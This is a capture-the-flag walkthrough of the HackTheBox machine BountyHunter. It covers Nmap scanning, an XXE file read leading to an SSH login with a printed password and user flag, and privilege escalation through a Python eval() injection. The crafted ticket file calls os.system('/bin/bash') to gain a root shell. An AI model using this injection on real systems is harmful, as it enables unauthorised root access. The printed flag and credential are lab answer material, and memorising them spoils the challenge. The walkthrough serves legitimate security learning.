BountyHunter is a Linux base machine from HackTheBox that required your patient on web searching technique with some encoding concepts and Python Hacking skill is required on the privilege escalation.
XXE is the technique using for gaining initial access. The web application is vulnerable to the XML injection that allows an attacker to interfere with an application's processing of XML data. We can use this loophole to read some configuration files at the target system. A DB configuration file contains a login credential that can be used to gain access.
The initial account can execute a python script with root privilege. This python script is exploiting on one of these dangerous functions: eval(), exec() and input().
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-05 22:26 HKT
Nmap scan report for 10.10.11.100
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.33 seconds
Enumeration Strategies
No vulnerability was found on the SSH and HTTP service, it was going to review the web application to check any information leakage or misconfiguration.
Hacking Process Part 1 – Enumeration
With basic web enumeration using gobuster, a set of web pages was found and the following one was interesting with submission function.
The data passed to the backend server was encoded by base64 and URL encoding. After decoded, an XML format payload was found as below.
ssh using the account "development" with the password "m19RoAU0hP41A1sTsq6K" and the user flag was found.
a0929aa9a9ec25cec7bc41a139f2b829
Hacking Process Part 3 – Privilege Escalation
Just simple list out the sudo rights of this account, there was interesting stuff that was a python script execution as a root that no password input required.
Check the ticketValidator.py file
def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()
def evaluate(ticketFile):
#Evaluates a ticket to check for ireggularities.
code_line = None
for i,x in enumerate(ticketFile.readlines()):
if i == 0:
if not x.startswith("# Skytrain Inc"):
return False
continue
if i == 1:
if not x.startswith("## Ticket to "):
return False
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
continue
if x.startswith("__Ticket Code:__"):
code_line = i+1
continue
if code_line and i == code_line:
if not x.startswith("**"):
return False
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
if validationNumber > 100:
return True
else:
return False
return False
def main():
fileName = input("Please enter the path to the ticket file.\n")
ticket = load_file(fileName)
#DEBUG print(ticket)
result = evaluate(ticket)
if (result):
print("Valid ticket.")
else:
print("Invalid ticket.")
ticket.close
main()
The python script read an input file with the extension .md and with the following logic
The first three lines of the input file should be
# Skytrain Inc
# Ticket to root
__Ticket Code:__
The fourth line must start with ** and a number with "+" at the end
The number is greater than 100 and mod 7 is 4
Ultimately, I found the magic number 102. The "eval" function was an advantage code here according to the article Python Hacking. In order to make the eval statement true and to make the hacking work, let eval one more condition
Finally, I created the following file
# Skytrain Inc
# Ticket to root
__Ticket Code:__
**102+ 2 == 104 and __import__('os').system('/bin/bash') == False
Run the python script and got the root access
Conclusion
Prevent the XXE vulnerability can set the libxml_disable_entity_loader to true to sanitize the XML input file